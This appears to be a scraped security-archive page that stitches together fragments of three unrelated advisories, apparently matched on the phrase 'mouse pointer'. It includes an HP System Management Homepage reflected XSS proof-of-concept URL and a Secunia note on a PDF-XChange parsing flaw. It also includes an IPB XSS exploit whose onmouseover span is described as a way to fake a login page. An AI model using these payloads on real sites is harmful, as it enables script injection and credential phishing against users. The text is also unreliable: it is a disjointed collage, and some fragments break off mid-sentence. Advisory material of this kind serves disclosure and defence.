mouse pointer

PR10-11: Multiple XSS injection vulnerabilities and an offsite redirection flaw within HP System Management Homepage (Insight Manager)

Hardware Proliant DL380 G5, DL360 G5, DL380 G4

1) Basic reflective XSS attack (Windows only).

Proof of concept (move mouse pointer over search input box):

https://target-domain.foo:2381/hpdiags/frontend2/help/search.php?query="onmouseover="alert(1);

References: HP Customer Notice: HPSBMA02615 SSRT100228 rev.1 CVE-2010-4111


Secunia Research: PDF-XChange Viewer Content Parsing Memory Corruption Vulnerability

views a malicious PDF document.

NOTE: The vulnerable code is e.g. also present in the bundled 
PDF-XChange shell extension (XCShInfo.dll), which is installed by 
default. This vector allows exploitation as soon as a user e.g. 
selects a malicious PDF file or hovers the mouse pointer over it.

====================================================================== 
5) Solution 

Update to version 2.044.

IPB v2.x up to 3.0.4 XSS vulnerability

[+] Exploit

        --------------------------------->8---------------------------------
        <span onmouseover="javascript:alert('XSS');function fakeLoginPage(){...}">move your mouse pointer here</span>
        ---------------------------------8<---------------------------------

        fakeLoginPage() function can be used to rewrite the whole page,
faking a login page through an embedded iframe.




Copyright © 1995-2012 LinuxRocket.net. All rights reserved.